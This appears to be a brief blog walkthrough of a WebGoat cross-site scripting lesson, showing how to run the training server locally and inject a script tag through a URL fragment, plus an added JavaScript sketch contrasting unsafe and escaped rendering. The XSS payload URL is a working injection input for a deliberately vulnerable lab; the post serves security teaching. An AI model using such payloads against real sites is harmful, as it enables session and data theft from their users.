Wednesday, December 29, 2021

cross site scripting intro WebGoat

download WebGoat from https://github.com/WebGoat/WebGoat/releases
if the WebGoat release needs a newer Java version than the one installed on Linux, download an earlier release

start server
java -Dfile.encoding=UTF-8 -Dserver.port=8080 -Dserver.address=localhost -Dhsqldb.port=9001 -jar webgoat-server-8.1.0.jar

open http://localhost:8080/WebGoat/
register new user

xss lesson 10 -> inspect element -> debugger -> goatRouter.js -> find test route

inject script into url
http://localhost:8080/WebGoat/start.mvc#test/<script>webgoat.customjs.phoneHome();<%2Fscript>
inspect element -> console -> script executed
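
Added example, not from the original post and not WebGoat's own code: a simplified model of why the text after #test/ runs as script when a route handler writes it into the page as markup, next to an escaped version. The function names and the markup are assumptions.

```javascript
// Simplified model of a hash-fragment route that reflects its parameter
// into the page. All names here are hypothetical, not WebGoat's code.

// Split "#test/<param>" into the route name and the URL-decoded parameter.
function parseHashRoute(hash) {
  const body = hash.startsWith('#') ? hash.slice(1) : hash;
  const slash = body.indexOf('/');
  if (slash === -1) return { route: body, param: '' };
  let param = body.slice(slash + 1);
  try {
    param = decodeURIComponent(param); // "%2F" becomes "/"
  } catch (e) {
    // Malformed percent-encoding: keep the raw text instead of failing.
  }
  return { route: body.slice(0, slash), param };
}

// Encode the characters that let text break out into HTML markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable form: the parameter is concatenated into markup unchanged,
// so a <script> element in the URL fragment becomes part of the page.
function renderTestRouteUnsafe(param) {
  return '<div class="lesson-content">test:' + param + '</div>';
}

// Hardened form: the parameter is treated as text. In a browser, assigning
// it to element.textContent gives the same result without building HTML.
function renderTestRouteSafe(param) {
  return '<div class="lesson-content">test:' + escapeHtml(param) + '</div>';
}

// Constructed sample: the fragment of the URL used in the steps above.
const sampleHash = '#test/<script>webgoat.customjs.phoneHome();<%2Fscript>';
const parsed = parseHashRoute(sampleHash);
console.log('route :', parsed.route);
console.log('unsafe:', renderTestRouteUnsafe(parsed.param));
console.log('safe  :', renderTestRouteSafe(parsed.param));
```
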
reference: https://www.youtube.com/watch?v=zCGOvvQknoc
